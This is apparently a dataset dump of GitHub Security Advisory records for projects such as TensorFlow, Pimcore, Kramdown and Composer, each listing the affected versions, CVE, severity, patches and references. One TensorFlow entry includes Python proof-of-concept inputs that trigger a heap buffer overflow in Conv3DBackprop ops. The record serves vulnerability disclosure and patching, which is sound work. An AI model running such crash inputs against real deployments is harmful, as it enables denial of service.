ecosystem
stringclasses 11
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
220
⌀ | details
stringlengths 34
13.5k
| aliases
stringlengths 17
87
⌀ | modified_date
stringdate 2019-03-26 14:13:00
2022-05-10 08:46:52
| published_date
stringdate 2012-06-17 03:41:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 581
values | refs
stringlengths 82
11.6k
| introduced
stringclasses 843
values | code_refs
stringlengths 46
940
| commits
stringlengths 46
940
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA | GHSA-c6fg-99pr-25m9 | Uncapped length of skin data fields submitted by players | ### Impact
Some skin data fields (e.g. skinID, geometryName) are not capped in length. These fields are typically saved in the NBT data of a player when the player quits the server, or during an autosave.
This is problematic due to the 32767 byte limit on `TAG_String`s. If any of these fields exceeds 32767 bytes, an exception will be thrown during data saving, which will cause the server to crash.
Other fields (such as skinGeometryData) are also uncapped, but those have a much larger 2 GB length limit, so this is not a concern for those, particularly considering the decompressed packet size limit of 2 MB.
### Patches
PM3: 958a9dbf0fe3131ab60319c5a939f5dfbfe5dfbb
PM4: 6492cac5c10f9fa8443ceddd2191a7b65b73f601
### Workarounds
A plugin may check player skins during `PlayerLoginEvent` and `PlayerSkinChangeEvent` and ensure that the offending fields are not larger than 32767 bytes.
### For more information
If you have any questions or comments about this advisory:
* Email us at [team@pmmp.io](mailto:team@pmmp.io)
| null | 2022-01-06T23:53:58Z | 2022-01-06T23:53:58Z | HIGH | 7.5 | null | {'https://github.com/pmmp/PocketMine-MP/commit/6492cac5c10f9fa8443ceddd2191a7b65b73f601', 'https://github.com/advisories/GHSA-c6fg-99pr-25m9', 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-c6fg-99pr-25m9', 'https://github.com/pmmp/PocketMine-MP/commit/958a9dbf0fe3131ab60319c5a939f5dfbfe5dfbb'} | null | {'https://github.com/pmmp/PocketMine-MP/commit/6492cac5c10f9fa8443ceddd2191a7b65b73f601', 'https://github.com/pmmp/PocketMine-MP/commit/958a9dbf0fe3131ab60319c5a939f5dfbfe5dfbb'} | {'https://github.com/pmmp/PocketMine-MP/commit/6492cac5c10f9fa8443ceddd2191a7b65b73f601', 'https://github.com/pmmp/PocketMine-MP/commit/958a9dbf0fe3131ab60319c5a939f5dfbfe5dfbb'} |
GHSA | GHSA-54fx-gm74-q676 | Permissions bypass in SmallRye | A flaw was found in SmallRye's API through version 1.6.1. The API can allow other code running within the application server to potentially obtain the ClassLoader, bypassing any permissions checks that should have been applied. The largest threat from this vulnerability is a threat to data confidentiality. This is fixed in SmallRye 1.6.2 | {'CVE-2020-1729'} | 2022-03-21T20:50:43Z | 2022-03-18T17:55:47Z | MODERATE | 4 | {'CWE-863'} | {'https://github.com/smallrye/smallrye-config/commit/fb0def6f61c09a2a80c9145e4ec6521225cd0b99', 'https://bugzilla.redhat.com/show_bug.cgi?id=1802444', 'https://github.com/advisories/GHSA-54fx-gm74-q676', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1729'} | null | {'https://github.com/smallrye/smallrye-config/commit/fb0def6f61c09a2a80c9145e4ec6521225cd0b99'} | {'https://github.com/smallrye/smallrye-config/commit/fb0def6f61c09a2a80c9145e4ec6521225cd0b99'} |
GHSA | GHSA-4r8q-gv9j-3xx6 | Open Redirect | ### Impact
In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL.
This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have `force_https` set to `true` (default: `false`)
### Patches
Version 5.7.2 contains the relevant patches to fix this bug. Stripping the URL from special characters to prevent specially crafted URL's from being redirected to.
### Workarounds
There is a simple way to work around the security issue
- Set the `force_https` to every tenant to `false`
### References
https://nvd.nist.gov/vuln/detail/CVE-2018-11784
### For more information
If you have any questions or comments about this advisory:
* Contact us in Discord: https://tenancy.dev/chat
| {'CVE-2021-32645'} | 2022-03-21T20:46:04Z | 2022-03-18T17:55:07Z | MODERATE | 4.3 | {'CWE-601'} | {'https://webmasters.googleblog.com/2009/01/open-redirect-urls-is-your-site-being.html', 'https://github.com/tenancy/multi-tenant/commit/9c837a21bccce9bcaeb90033ef200d84f0d9e164', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32645', 'https://packagist.org/packages/hyn/multi-tenant', 'https://github.com/advisories/GHSA-4r8q-gv9j-3xx6', 'https://github.com/tenancy/multi-tenant/security/advisories/GHSA-4r8q-gv9j-3xx6'} | null | {'https://github.com/tenancy/multi-tenant/commit/9c837a21bccce9bcaeb90033ef200d84f0d9e164'} | {'https://github.com/tenancy/multi-tenant/commit/9c837a21bccce9bcaeb90033ef200d84f0d9e164'} |
GHSA | GHSA-pc5p-h8pf-mvwp | Machine-In-The-Middle in https-proxy-agent | Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials.
## Recommendation
Upgrade to version 3.0.0 or 2.2.3. | null | 2021-08-23T15:27:25Z | 2020-04-16T03:14:56Z | MODERATE | 6.1 | {'CWE-300'} | {'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b', 'https://github.com/advisories/GHSA-pc5p-h8pf-mvwp', 'https://www.npmjs.com/advisories/1184', 'https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131', 'https://hackerone.com/reports/541502'} | null | {'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b'} | {'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b'} |
GHSA | GHSA-8jxq-75rw-fhj9 | Eve allows execution of arbitrary code via Code Injection in the where parameter | io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter. | {'CVE-2018-8097'} | 2022-04-26T18:10:00Z | 2018-07-12T20:29:35Z | CRITICAL | 9.8 | {'CWE-94'} | {'https://github.com/pyeve/eve/commit/f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98', 'https://github.com/pyeve/eve/issues/1101', 'https://github.com/advisories/GHSA-8jxq-75rw-fhj9', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8097'} | null | {'https://github.com/pyeve/eve/commit/f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98'} | {'https://github.com/pyeve/eve/commit/f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98'} |
GHSA | GHSA-j29f-m23h-3p8p | Cross-site Scripting in Pimcore | Pimcore 10.3.3 and prior is vulnerable to stored cross-site scripting. A patch is available on the 10.x branch and will likely be part of version 10.4.0. | {'CVE-2022-0911'} | 2022-03-29T21:29:56Z | 2022-03-17T00:00:48Z | MODERATE | 5.4 | {'CWE-79'} | {'https://huntr.dev/bounties/b242edb1-b036-4dca-9b53-891494dd7a77', 'https://github.com/pimcore/pimcore/pull/11447', 'https://github.com/advisories/GHSA-j29f-m23h-3p8p', 'https://github.com/pimcore/pimcore/commit/6e0922c5b2959ac1b48500ac508d8fc5a97286f9', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0911'} | null | {'https://github.com/pimcore/pimcore/commit/6e0922c5b2959ac1b48500ac508d8fc5a97286f9'} | {'https://github.com/pimcore/pimcore/commit/6e0922c5b2959ac1b48500ac508d8fc5a97286f9'} |
GHSA | GHSA-52p9-v744-mwjj | Remote code execution in Kramdown | Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters namespace, and thus arbitrary classes can be instantiated. | {'CVE-2021-28834'} | 2021-04-14T18:12:09Z | 2021-03-29T16:30:34Z | HIGH | 9.8 | {'CWE-94'} | {'https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760', 'https://github.com/gettalong/kramdown/compare/REL_2_3_0...REL_2_3_1', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28834', 'https://github.com/advisories/GHSA-52p9-v744-mwjj', 'https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYOLQKFL6IJCQLBXV34Z4TI4O54GESPR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3BBLUIDCUUR3NEE4NJLOCCAV3ALQ3O6/', 'https://github.com/gettalong/kramdown/pull/708', 'https://www.debian.org/security/2021/dsa-4890', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJCJVYHPY6LNUFM6LYZIAUIYOMVT5QGV/', 'https://gitlab.com/gitlab-org/gitlab/-/commit/179329b5c3c118924fb242dc449d06b4ed6ccb66', 'https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options'} | null | {'https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2', 'https://gitlab.com/gitlab-org/gitlab/-/commit/179329b5c3c118924fb242dc449d06b4ed6ccb66', 'https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760'} | {'https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760', 'https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2'} |
GHSA | GHSA-28hp-fgcr-2r4h | Cross-Site Scripting via JSONP | JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors. | null | 2021-08-17T15:35:31Z | 2019-06-27T17:25:42Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-28hp-fgcr-2r4h', 'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4', 'https://www.npmjs.com/advisories/1630'} | null | {'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4'} | {'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4'} |
GHSA | GHSA-rww7-2gpw-fv6j | Crash when type cannot be specialized in Tensorflow | ### Impact
Under certain scenarios, TensorFlow can fail to specialize a type during [shape inference](https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/framework/shape_inference.cc#L168-L174):
```cc
void InferenceContext::PreInputInit(
const OpDef& op_def, const std::vector<const Tensor*>& input_tensors,
const std::vector<ShapeHandle>& input_tensors_as_shapes) {
const auto ret = full_type::SpecializeType(attrs_, op_def);
DCHECK(ret.status().ok()) << "while instantiating types: " << ret.status();
ret_types_ = ret.ValueOrDie();
// ...
}
```
However, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the `ValueOrDie` line. This results in an assertion failure as `ret` contains an error `Status`, not a value. In the second case we also get a crash due to the assertion failure.
### Patches
We have patched the issue in GitHub commit [cb164786dc891ea11d3a900e90367c339305dc7b](https://github.com/tensorflow/tensorflow/commit/cb164786dc891ea11d3a900e90367c339305dc7b).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2022-23572'} | 2022-02-11T20:48:06Z | 2022-02-09T23:28:29Z | MODERATE | 6.5 | {'CWE-754'} | {'https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/framework/shape_inference.cc#L168-L174', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23572', 'https://github.com/tensorflow/tensorflow/commit/cb164786dc891ea11d3a900e90367c339305dc7b', 'https://github.com/advisories/GHSA-rww7-2gpw-fv6j', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rww7-2gpw-fv6j'} | null | {'https://github.com/tensorflow/tensorflow/commit/cb164786dc891ea11d3a900e90367c339305dc7b'} | {'https://github.com/tensorflow/tensorflow/commit/cb164786dc891ea11d3a900e90367c339305dc7b'} |
GHSA | GHSA-pwwm-pwx2-2hw7 | Generation of Error Message Containing Sensitive Information in Snipe-IT | Snipe-IT prior to version 5.3.11 is vulnerable to Generation of Error Message Containing Sensitive Information. | {'CVE-2022-0622'} | 2022-02-26T01:13:46Z | 2022-02-18T00:00:37Z | MODERATE | 5.3 | {'CWE-209'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-0622', 'https://github.com/snipe/snipe-it/commit/178e44095141ab805c282f563fb088df1a10b2e2', 'https://huntr.dev/bounties/4ed99dab-5319-4b6b-919a-84a9acd0061a', 'https://github.com/advisories/GHSA-pwwm-pwx2-2hw7'} | null | {'https://github.com/snipe/snipe-it/commit/178e44095141ab805c282f563fb088df1a10b2e2'} | {'https://github.com/snipe/snipe-it/commit/178e44095141ab805c282f563fb088df1a10b2e2'} |
GHSA | GHSA-r659-8xfp-j327 | Prototype Pollution in objection.js | objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16. | {'CVE-2021-3766'} | 2021-10-08T20:12:34Z | 2021-09-07T23:09:43Z | CRITICAL | 9.8 | {'CWE-1321', 'CWE-915'} | {'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766', 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc', 'https://github.com/advisories/GHSA-r659-8xfp-j327'} | null | {'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9'} | {'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6'} |
GHSA | GHSA-773h-w45w-f2f9 | Denial of service vulnerability exists in libxmljs | libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash. | {'CVE-2022-21144'} | 2022-05-04T14:48:04Z | 2022-05-03T00:00:46Z | HIGH | 0 | {'CWE-400'} | {'https://snyk.io/vuln/SNYK-JS-LIBXMLJS-2348756', 'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21144', 'https://github.com/advisories/GHSA-773h-w45w-f2f9', 'https://github.com/libxmljs/libxmljs/pull/594'} | null | {'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d'} | {'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d'} |
GHSA | GHSA-6gww-qpm6-mc2g | Server-Side Request Forgery in ssrf-agent | The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private. | {'CVE-2021-23718'} | 2021-12-06T21:36:54Z | 2021-12-02T17:51:51Z | MODERATE | 6.5 | {'CWE-918'} | {'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346', 'https://security.netapp.com/advisory/ntap-20211203-0005/', 'https://snyk.io/vuln/SNYK-JS-SSRFAGENT-1584362', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23718', 'https://github.com/advisories/GHSA-6gww-qpm6-mc2g', 'https://github.com/welefen/ssrf-agent/blob/cec2b85fe8886ad6926a247a3e059d8369ec022b/index.js%23L13'} | null | {'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346'} | {'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346'} |
GHSA | GHSA-q67f-3jq4-mww2 | Cross-site Scripting in Pimcore | Pimcore version 10.3.2 and prior is vulnerable to stored cross-site scripting. A patch is available and anticipated to be part of version 10.3.3. | {'CVE-2022-0831'} | 2022-03-11T23:22:38Z | 2022-03-05T00:00:45Z | MODERATE | 5.4 | {'CWE-79'} | {'https://github.com/pimcore/pimcore/commit/e786fd44aac46febdbf916ed6c328fbe645d80bf', 'https://github.com/advisories/GHSA-q67f-3jq4-mww2', 'https://huntr.dev/bounties/4152e3a7-27a1-49eb-a6eb-a57506af104f', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0831'} | null | {'https://github.com/pimcore/pimcore/commit/e786fd44aac46febdbf916ed6c328fbe645d80bf'} | {'https://github.com/pimcore/pimcore/commit/e786fd44aac46febdbf916ed6c328fbe645d80bf'} |
GHSA | GHSA-9423-6c93-gpp8 | Arbitrary File Write via Archive Extraction (Zip Slip) | The CPIO extraction functionality doesn't sanitize the paths of the archived files for leading and non-leading ".." which leads in file extraction outside of the current directory. Note, the fixing commit was applied to all affected versions which were re-released. | {'CVE-2020-7667'} | 2022-01-04T19:27:35Z | 2021-06-23T17:13:29Z | HIGH | 7.5 | {'CWE-22'} | {'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSASSOFTWAREGORPMUTILSCPIO-570427', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7667', 'https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0', 'https://github.com/advisories/GHSA-9423-6c93-gpp8'} | null | {'https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0'} | {'https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0'} |
GHSA | GHSA-hfm2-fffh-v47v | Out-of-bounds write | A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1140, CVE-2019-1141, CVE-2019-1195, CVE-2019-1197. | {'CVE-2019-1196'} | 2021-03-29T20:58:01Z | 2021-03-29T20:58:01Z | HIGH | 7.5 | {'CWE-787'} | {'https://github.com/chakra-core/ChakraCore/commit/dce7443ae45f82eceec3284974610e1a1bbe6792', 'https://github.com/advisories/GHSA-hfm2-fffh-v47v', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1196', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1196', 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'} | null | {'https://github.com/chakra-core/ChakraCore/commit/dce7443ae45f82eceec3284974610e1a1bbe6792', 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'} | {'https://github.com/chakra-core/ChakraCore/commit/dce7443ae45f82eceec3284974610e1a1bbe6792', 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'} |
GHSA | GHSA-vqmr-957g-r7w3 | High severity vulnerability that affects rendertron | Installed packages are exposed by node_modules in Rendertron 1.0.0, allowing remote attackers to read absolute paths on the server by examining the "_where" attribute of package.json files. | {'CVE-2017-18355'} | 2021-09-20T22:15:16Z | 2019-02-12T15:36:39Z | HIGH | 7.5 | {'CWE-200'} | {'https://github.com/GoogleChrome/rendertron/pull/88', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18355', 'https://github.com/advisories/GHSA-vqmr-957g-r7w3', 'https://bugs.chromium.org/p/chromium/issues/detail?id=759111'} | null | {'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'} | {'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'} |
GHSA | GHSA-g996-q5r8-w7g2 | Escape validation messages in the PHP templating engine | In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, validation messages are not escaped, which can lead to XSS when user input is included. This is related to symfony/framework-bundle. | {'CVE-2019-10909'} | 2021-08-18T22:15:16Z | 2019-11-12T23:00:53Z | MODERATE | 5.4 | {'CWE-79'} | {'https://github.com/symfony/symfony/commit/ab4d05358c3d0dd1a36fc8c306829f68e3dd84e2', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10909', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/framework-bundle/CVE-2019-10909.yaml', 'https://www.drupal.org/sa-core-2019-005', 'https://symfony.com/blog/cve-2019-10909-escape-validation-messages-in-the-php-templating-engine', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10909.yaml', 'https://github.com/advisories/GHSA-g996-q5r8-w7g2', 'https://www.synology.com/security/advisory/Synology_SA_19_19', 'https://symfony.com/cve-2019-10909'} | null | {'https://github.com/symfony/symfony/commit/ab4d05358c3d0dd1a36fc8c306829f68e3dd84e2'} | {'https://github.com/symfony/symfony/commit/ab4d05358c3d0dd1a36fc8c306829f68e3dd84e2'} |
GHSA | GHSA-wcv5-qrj6-9pfm | Heap buffer overflow in `Conv3DBackprop*` | ### Impact
Missing validation between arguments to `tf.raw_ops.Conv3DBackprop*` operations can result in heap buffer overflows:
```python
import tensorflow as tf
input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
```python
import tensorflow as tf
input_values = [-10.0] * (7 * 7 * 7 * 7 * 7)
input_values[0] = 429.6491056791816
input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32)
filter_tensor = tf.constant([7, 7, 7, 1, 1], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[7, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 37, 65, 93, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/4814fafb0ca6b5ab58a09411523b2193fed23fed/tensorflow/core/kernels/conv_grad_shape_utils.cc#L94-L153) assumes that the `input`, `filter_sizes` and `out_backprop` tensors have the same shape, as they are accessed in parallel.
### Patches
We have patched the issue in GitHub commit [8f37b52e1320d8d72a9529b2468277791a261197](https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our securityguide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team. | {'CVE-2021-29520'} | 2022-04-26T18:10:21Z | 2021-05-21T14:21:12Z | LOW | 2.5 | {'CWE-787', 'CWE-120'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wcv5-qrj6-9pfm', 'https://github.com/advisories/GHSA-wcv5-qrj6-9pfm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29520', 'https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197'} | null | {'https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197'} | {'https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197'} |
GHSA | GHSA-gw5h-h6hj-f56g | Improper Authorization in Gogs | ### Impact
Expired PAM accounts and accounts with expired passwords are continued to be seen as valid. Installations use PAM as authentication sources are affected.
### Patches
Expired PAM accounts and accounts with expired passwords are no longer being seen as valid. Users should upgrade to 0.12.5 or the latest 0.13.0+dev.
### Workarounds
In addition to marking PAM accounts as expired, also disable/lock them. Running `usermod -L <username>` will add an exclamation mark to the password hash and would result in wrong passwords responses when trying to login.
### References
https://huntr.dev/bounties/ea82cfc9-b55c-41fe-ae58-0d0e0bd7ab62/
### For more information
If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/6810.
| null | 2022-04-19T19:03:27Z | 2022-03-14T22:58:37Z | HIGH | 8.2 | {'CWE-285'} | {'https://huntr.dev/bounties/ea82cfc9-b55c-41fe-ae58-0d0e0bd7ab62', 'https://github.com/gogs/gogs/security/advisories/GHSA-gw5h-h6hj-f56g', 'https://github.com/gogs/gogs/commit/64102be2c90e1b47dbdd379873ba76c80d4b0e78', 'https://github.com/advisories/GHSA-gw5h-h6hj-f56g'} | null | {'https://github.com/gogs/gogs/commit/64102be2c90e1b47dbdd379873ba76c80d4b0e78'} | {'https://github.com/gogs/gogs/commit/64102be2c90e1b47dbdd379873ba76c80d4b0e78'} |
GHSA | GHSA-frqg-7g38-6gcf | Improper escaping of command arguments on Windows leading to command injection | ### Impact
Windows users running Composer to install untrusted dependencies are affected and should definitely upgrade for safety. Other OSs and WSL are not affected.
### Patches
1.10.23 and 2.1.9 fix the issue
### Workarounds
None
| {'CVE-2021-41116'} | 2022-04-22T15:41:33Z | 2021-10-05T20:23:18Z | HIGH | 8.2 | {'CWE-77'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-41116', 'https://github.com/composer/composer/security/advisories/GHSA-frqg-7g38-6gcf', 'https://www.tenable.com/security/tns-2022-09', 'https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa', 'https://github.com/advisories/GHSA-frqg-7g38-6gcf'} | null | {'https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa'} | {'https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa'} |
GHSA | GHSA-rp63-jfmw-532w | High severity vulnerability that affects mail | The Mail gem before 2.4.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a (1) sendmail or (2) exim delivery. | {'CVE-2012-2140'} | 2021-09-17T19:22:25Z | 2017-10-24T18:33:38Z | HIGH | 0 | {'CWE-20'} | {'http://secunia.com/advisories/48970', 'https://github.com/mikel/mail/commit/39b590ddb08f90ddbe445837359a2c8843e533d0', 'http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080645.html', 'https://github.com/mikel/mail/commit/ac56f03bdfc30b379aeecd4ff317d08fdaa328c2', 'http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080747.html', 'https://github.com/mikel/mail/blob/9beb079c70d236a5ad2e1ba95b2c977e55deb7af/CHANGELOG.rdoc', 'http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080648.html', 'https://nvd.nist.gov/vuln/detail/CVE-2012-2140', 'http://www.openwall.com/lists/oss-security/2012/04/25/8', 'https://bugzilla.redhat.com/show_bug.cgi?id=816352', 'http://www.openwall.com/lists/oss-security/2012/04/26/1', 'https://github.com/advisories/GHSA-rp63-jfmw-532w', 'https://bugzilla.novell.com/show_bug.cgi?id=759092'} | null | {'https://github.com/mikel/mail/commit/39b590ddb08f90ddbe445837359a2c8843e533d0', 'https://github.com/mikel/mail/commit/ac56f03bdfc30b379aeecd4ff317d08fdaa328c2'} | {'https://github.com/mikel/mail/commit/ac56f03bdfc30b379aeecd4ff317d08fdaa328c2', 'https://github.com/mikel/mail/commit/39b590ddb08f90ddbe445837359a2c8843e533d0'} |
GHSA | GHSA-hjgp-8ffr-hwwr | Downloads Resources over HTTP in closurecompiler | Affected versions of `closurecompiler` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `closurecompiler`.
## Recommendation
